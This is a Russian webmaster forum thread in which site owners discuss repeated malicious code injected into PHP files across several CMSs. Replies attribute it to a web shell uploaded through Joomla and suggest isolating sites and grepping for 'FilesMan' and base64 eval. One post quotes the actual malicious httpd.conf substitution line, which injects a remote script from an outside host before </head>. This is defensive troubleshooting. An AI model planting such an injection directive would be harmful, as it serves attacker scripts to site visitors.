- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Добрый день!
На VDS под FreeBSD-8 есть несколько десятков сайтов с различными CMS. Примерно раз в месяц замечаю, что некоторые файлы в сайтах изменяются. Признаки одинаковые: меняются .php файлы, перед закрывающим тегом /<head> прописывается код типа
Код во всех измененных файлах одинаковый. Меняются файлы в разных СMS - замечал в WordPress, HostCMS, WikiMedia, DLE (с заплаткой). Пароли менял, не помогло. Может, кто встречал такую инфу?
Техподдержка хостинга клянется, что скорее всего взламывают через дырку в Joomla. Один из сайтов действительно на этой CMS, но я не понимаю, действительно ли этот пииии :madd: может через один сайт менять и другие?
Как думаете, права техподдержка, или это у них уязвимость есть?
смотрите логи. уязвимость может быть в любом из движков, а может у вас с компа вирусами просто украли фтп пароли.
Да. На 1 заливается шелл и у хакера доступ полный как у вас на фтп.
Если сайты не изолированы друг от друга - то стоит это сделать.
Через 1 - можно все разнести в сопли
Техподдержка хостинга клянется, что скорее всего взламывают через дырку в Joomla. Один из сайтов действительно на этой CMS, но я не понимаю, действительно ли этот пииии 😡 может через один сайт менять и другие?
Как думаете, права техподдержка, или это у них уязвимость есть?
как запускается php (вряд ли apache mpm-itk)? разнесены ли сайты по отдельным аккаунтам?
скорее всего саппорт прав, вломили джумлу, имеют доступ к файлам пользователя apache, через вебшелл. тк вломить впс ноду немного сложнее чем просто необновлявшуюся джумлу...
ОК, всем спасибо. Сайты не были разнесены по отдельным аккаунтам, исправляю данное упущение.
Сайты не были разнесены по отдельным аккаунтам, исправляю данное упущение.
🙅 главное чтобы еще пхп запускался с правами пользователя, на аккаунте которого расположен файл, а не апача.
mod-itk, mpm-peruser, suрhp и тд
Банально, но это в большинстве случаев поможет найти шелл:
find . -exec grep -l "FilesMan" {} \;Все файлы которых найдёт просмотреть и удалить весь или часть с шеллом ;) Проявив смекалку можно найти и другое ;)
Такая же бяка завелась, весь код вроде облазил не нашел. апач ittk.
сижу в раздумьях откуда оно лезти может
Видимо каким то образом руткит произошел, в файлик httpd.conf добавлена строчка
#AddOutputFilterByType SUBSTITUTE text/html
#Substitute 's|</head>|<script language="JavaScript" src="http://3xindiansex.com/st/css/js/jq-footer.js" type="text/javascript"></script></head>|ni'
Пробовали искать eval'ы с base64_decode? Простой grep на JS ссылку точно ничего не даст. Если шелл есть, то наверняка ужат с помощью base64 и сидит где-нибудь очень глубоко.